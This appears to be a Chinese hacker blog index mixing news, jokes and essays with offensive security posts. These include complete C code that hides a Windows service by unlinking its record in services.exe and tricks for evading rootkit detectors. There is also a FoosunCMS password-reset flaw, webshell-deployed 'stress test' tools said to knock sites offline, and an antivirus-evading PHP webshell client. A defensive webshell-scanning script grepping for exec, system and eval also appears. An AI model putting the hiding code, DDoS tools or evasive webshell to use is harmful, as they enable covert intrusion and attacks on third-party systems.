Mozilla公司宣布用户报告火狐漏洞,最高将获得3000美元奖励。
最初Mozilla设置的奖励金额为500美元,这也是谷歌为其Chrome浏览器设置的奖励金额,也是谷歌奖励过的最高1,337美元的两倍。Mozilla和谷歌是业界唯一会向报告漏洞的用户提供奖励的浏览器生产商。
“六年来,Mozilla的奖励计划做了不少的调整。我们相信,最好的保证用户浏览安全的方法就是引入奖励机制,”Mozilla的安全设计部门总监 Lucas Adamski说。从2004年8月开始,Mozilla就推出了报告漏洞奖励计划。
只有那些被Mozilla列为“严重” 和“高危”的漏洞可以得到奖励。在Mozilla的分级制度里,严重的漏洞是那些会导致遥控代码执行的,换句话说,会导致黑客完全控制电脑的漏洞。高危漏 洞是那些会暴露用户关键信息,如用户名,密码和信用卡号码的漏洞。“拒绝服务“漏洞不符合奖励计划。
阅读全文...
1.昨晚座公交,快到终点了特别空,一年轻女子投入地讲电话,先是很小声,边讲还边抽泣,突然 嗓门放大来了句颤音:“你到底要做我丈夫还是姐夫!” 稀稀拉拉几个人瞬时安静侧目,陷入无限联想中……
2.某天自己下楼逛超市回来,刚一开门,娇声娇气的朝屋里问了句:先生,要服务吗?结果老公没应声,狗狗喜颠颠跑过来奶声奶气的:“汪、汪!” 老公笑倒~
3.大一由于校区没建好,学生太多,大一在陆军学院上学,那里有军队,一次学校组织看电影,得2块钱买票,我和我哥们阿磊没买票不想去,吃完饭我们又想去,我俩就结伴寻思能偷着进去看个免费的,我们俩来到大礼堂,手刚伸到门把手,身后一片亮光,我以为是探照灯,我对磊说,我草,果然是军校,然后我俩把手举起来了,结果一辆汽车转弯而去……
4.话说高中的时候,手机还是非常昂贵的。某同学攒钱N久终于买了一部M牌的带电线,那叫做一个爱不释手啊。因为怕磨损,去手机店贴膜。当天也是巧了,正好手机膜卖光了。这同学灵机一动,去药店买了一个安全套,直接套在手机上了,颗粒正好在键盘上,按起来手感还不错。最搞笑的:前边的储jing囊。正好放天线,后来每次打电话,引来目光无数……
阅读全文...
来自:ASM
过RKU,GMAER的dll模块检查的代码,就两句:
ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;
//下面是一个ring3下隐藏服务的代码,也是抄别人小小修改了一下而已的:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Tlhelp32.h>
// 几个Undocument的结构
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;
typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// ...
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// ...
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous;
PSC_SERVICE_RECORD Next;
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv;
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// ...
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;
int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)
{
int iLen;
iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);
if ((iLen > 1) || (iLen < 20))
{
ZeroMemory(lpChar, 40);
iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);
}
return iLen;
}
BOOL SetDebugPrivilege()
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}
if (hToken) CloseHandle(hToken);
return bRet;
}
DWORD GetProcessIdByName(char *Name)
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
if (!lstrcmpi(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle(hProcessSnap);
return Pid;
}
// 修改内存属性为指定值
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten;
VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}
//寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
char FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;
GetSystemDirectory( FileName, MAX_PATH );
strcat( FileName,"\\Services.exe");
hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL;
dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh);
hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL;
pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL;
dwSize -= 12;
for (i=0; i<dwSize; ++i)
{
// 搜索services!ScGetServiceDatabase特征代码
if (*(DWORD*)(pMap+i) == 0xa1909090 &&
*(DWORD*)(pMap+i+8) == 0x909090c3)
{
if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == 'vrEs') // ServiceRecord结构的特征
{
pRet = pSvcRd;
break;
}
}
}
UnmapViewOfFile(pMap);
CloseHandle(hFileMap);
CloseHandle(hFile);
//printf( "addr: 0x%08x\n", (DWORD *)pRet );
return pRet;
}
// 隐藏服务
BOOL HideService(char *Name)
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };
char lpSvcName[256] = {0};
dwNameSize = strlen(Name)*2; //UNICODE的话,长度要乘以2
if (dwNameSize > sizeof(SvcName))
{
return FALSE;
}
Pid = GetProcessIdByName("Services.exe");
if (Pid == -1)
{
printf("get pid error\r\n");
return FALSE;
}
if(!SetDebugPrivilege())
{
printf("SetDebugPrivilege error\r\n");
return FALSE;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
if (NULL == hProcess)
{
printf("OpenProcess error:%d\r\n",GetLastError());
return FALSE;
}
pSvcRd = FindFirstServiceRecord(hProcess);
if (NULL == pSvcRd)
{
printf("FindFirstServiceRecord error\r\n");
CloseHandle(hProcess);
return FALSE;
}
do
{
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))
{
//OutputDebugStringW(SvcName);
// 匹配服务名
memset(lpSvcName,0,sizeof(lpSvcName));
UnicodeToAnsiStr(lpSvcName,SvcName);
if (lstrcmpi(lpSvcName, Name) == NULL)
{
// 从链表中断开(一般来说ServiceRecord是可写的,但还是先改保护属性以防万一)
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);
CloseHandle(hProcess);
return TRUE;
}
}
else
{
break;
}
}
while (pSvcRd = SvcRd.Next);
if( NULL != hProcess )
{
CloseHandle(hProcess);
}
return FALSE;
}
int main()
{
HideService("Alerter");
return 0;
}
“我们没有高深的知识,我只不过是一个可怜的四年制中专生。我们没有高深的技术,我们只不过在学习着国外N年前的东西,其实无论网络还是生活,我们都是孤独”。
10年过去,刘庆的网络安全公司打着“红盟”的旗帜,俨然充当起“红客” 的“法定继承人”。而在他背后,中国黑客则挣扎在身份失焦、利益博弈和前路未卜的生存境遇中。
刘庆(右一)抢注的“红盟”商标及其公司的“红客”成员(左一为向明)。 摄影_姚松鑫
窗外正对着陆家嘴楼群,刘庆把影印的《外交政策》(Foreign Policy)杂志,往老板台上一拍,摊手诉苦:“这老美还把我写成一个'大黑客',甚至和年初攻击Google的'极光行动'联系到一起。”
今年三月号美国《外交政策》刊载了《中国黑客军团》(China's Hacker Army)一文,推测Google、 Adobe等上百家公司去年冬天受到来自中国的网络攻击,策源于“松散的牛仔式黑客组织”。一个网名为“Sharpwinner”的中国男人,在文中被指认为重要头目,并配发了一张肖像照。
阅读全文...
发布时间:2010-07-02
影响版本:
FooSun > 5.0
漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
在文件\User\ GetPassword.asp中:
ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码,只需要知道用户名和邮箱。
<*参考 Bug.Center.Team *>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
阅读全文...
点击↑小图放大
效果没有下面那个PHP的明显。
既然群里面的朋友要,也放出来吧。
使用方法:填写IP地址 端口 线程 AddtoAttack
有朋友说看不懂,我囧,英文在稀烂,猜也猜的到这几个功能。
下载地址:
阅读全文...
效果还是不错的,一般的网站直接打翻。
群里面,昨日重现和肖申克的救赎一直吵着要这种webshell下的压力测试工具。
有人拿这东西卖钱,装13,我Google了一下,国外的东西,下载下来共享之。
用法:通过各种方式上传到PHP网站目录下,填写IP地址,压力测试之。
下载地址:
阅读全文...
PS:看看这篇文章,各位棒子迷可以清晰下了。
题目:我眼中的韩国
作者:北大中文系教授孔庆东
一个国家的美,不是靠电视,不是靠包装,而是靠那些远到而来的客人。到过韩国的人都说韩国没有韩剧中的美,到过日本的人惊叹日本的富有和人民的素养。而这似乎很少在日剧中表达。这是何等的反差,越是将自己摆的高高在上,越是让人无法忍受。
韩剧中经常会流露出韩国作为富有国度的自负和对他国的无知,比如:《人小姐》中,女主角说,中国菜有什么好吃的,换来换去就是几样。" 而日剧似乎从未有过,至少在我看过的所有日剧中,他从未流露过对他国文化的贬损和自以为是的无知。
说了韩剧,说了日剧,再说我们中国人自己的影视。 很奇妙的组合,有时,朴实无华,房子小小的,人物小小的。有时又浩大的房子,奢侈的打扮,有时炫耀,有时不想炫耀,有时神秘,有时又不想神秘。但是不想去伪装,直接告诉世界,"我就是这个样子。" 日本人也许不善于用电视的形式炫耀,它永远就像一条溪流,爱不爱它都要流过。 韩国人骨子里的自卑却是一个时时想着炫耀的民族,韩剧里的韩国人永远比日本人富有。 至于中国,中国人,溪流也有,大海也有。不遮掩自己的贫穷,也绝不掩饰自己的富有。面对中国经济高速发展的今天,中国导演仍然时常将镜头对准中国的另一面,直面我们国家的现实。坦率说,中国的电视剧比韩剧深刻的多。面对历史和过去,中国导演又将镜头对准我们国家的另一面。 一个极端到另一个极端。是贫脊与辉煌。
阅读全文...
一、http_load
http_load以并行复用的方式运行,用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具,它可以以一个单
一的进程运行,一般不会把客户机搞死。还可以测试HTTPS类的网站请求。
#wget http://www.acme.com/software/http_load/http_load-12mar2006.tar.gz
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install
#http_load -p并发访问进程数 -f总计的访问次数 -r每秒的访问频率 -s访问时间 需要访问的url文件
#echo "http://192.168.1.101/test.php" >1.txt
#http_load -p 30 -s 60 1.txt
7751 fetches, 30 max parallel, 2.9119e+08 bytes, in 60.0024 seconds
37568 mean bytes/connection
129.178 fetches/sec, 4.85297e+06 bytes/sec
msecs/connect: 77.8017 mean, 3050.89 max, 30.308 min
msecs/first-response: 50.3716 mean, 9148.3 max, 31.205 min
HTTP response codes:code 200 -- 7751 说明打开响应页面的类型
http://www.acme.com/software这个网站上有很多小工具:http_ping、http_get、http_post
还有一个secure HTTP server:thttpd
二、webbench
阅读全文...
http://www.4shell.org/archives/1777.html
其实这个算不上是漏洞也谈不上0day,只能说是一个windows fun罢了。
测试如下:
1.选择任意一个exe文件,鼠标右键选择重命名:
有些PHP一句话马的客户端,遇见magic_quotes_gpc =On 提交之后就报错不能执行,或者遇见*nix系统不能提交。
随之写了一个,能完美兼容windows/*nix操作系统,无论magic_quotes_gpc 为On还是Off都能提交。
采用session模式,绝对无痕而且免杀,关闭浏览器后自动消失。
默认提交的是最新的phpspy2009大马,功能全面。
From:http://neeao.com/archives/16/
#!/bin/sh
#************************************************************
#Webshell Check Shell for php
#By:Neeao
#2008/7/17 v1.0 beta
#************************************************************
HOSTIP=`ifconfig eth0 |grep 'inet addr'|awk '{print $2;}'|cut -d: -f2`
#STR=`expr index $HOSTIP "192.168"`
#if [ ${STR} -eq 1 ]
# then
# HOSTIP=`ifconfig eth1 |grep 'inet addr'|awk '{print $2;}'|cut -d: -f2`
#fi
echo $HOSTIP
LogFile=/tmp/$HOSTIP.log
rm -rf $LogFile
date +%Y-%m-%d/%H:%M >> $LogFile
echo -e "\n" >> $LogFile
echo " ---------------------------------------------------------------------------------------------------" >> $LogFile
echo "|Executive Order function:exec(\|system(\|passthru(\|shell_exec(\|popen(\|proc_open(\|pcntl_exec( |" >> $LogFile
echo " ---------------------------------------------------------------------------------------------------" >> $LogFile
echo -e "\n" >> $LogFile
grep -in 'exec(\|system(\|passthru(\|shell_exec(\|popen(\|proc_open(\|pcntl_exec(' -R * | grep -iv '_exec' >> $LogFile
echo -e "\n" >> $LogFile
echo " -------------------------------------------------------------------------------------------" >> $LogFile
echo "|Deformation of the back door coding:eval(\|base64_decode(\|gzinflate(\|gzuncompress(\|chr( |" >> $LogFile
echo " --------------------------------------------------------------------------------------------" >> $LogFile
echo -e "\n" >> $LogFile
grep -in "eval(\|base64_decode(\|gzinflate(\|gzuncompress(\|chr(" -R * >> $LogFile
echo -e "\n" >> $LogFile
echo " -----------------------------------------------------------------------------------------------------------------" >> $LogFile
echo "|File operations function:dl(\|fopen(\|readfile(\|file(\|file_get_contents(\|opendir(\|chdir(\|fwrite(\|unlink(\|glob(|" >> $LogFile
echo " -----------------------------------------------------------------------------------------------------------------" >> $LogFile
echo -e "\n" >> $LogFile
grep -in "dl(\|fopen(\|readfile(\|file(\|file_get_contents(\|opendir(\|chdir(\|fwrite(\|unlink(\|glob(" -R * >> $LogFile
echo -e "\n" >> $LogFile
echo "----------------------------------" >> $LogFile
echo "|Files inculde bug:include|require|" >> $LogFile
echo "----------------------------------" >> $LogFile
echo -e "\n" >> $LogFile
grep -in "include.*\$.\|require.*\$." -R * >> $LogFile
echo -e "\n" >> $LogFile
echo "---------------------------------------------------------" >> $LogFile
echo "|Risk code Keyword:SQLyog\|phpAdsNew\|huansuan\|fckeditor|" >> $LogFile
echo "--------------------------------------------------------" >> $LogFile
echo -e "\n" >> $LogFile
grep -in "SQLyog\|phpAdsNew\|huansuan\|fckeditor" -R * >> $LogFile
cd /tmp
tar -zcvf $HOSTIP.tar.gz $HOSTIP.log
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论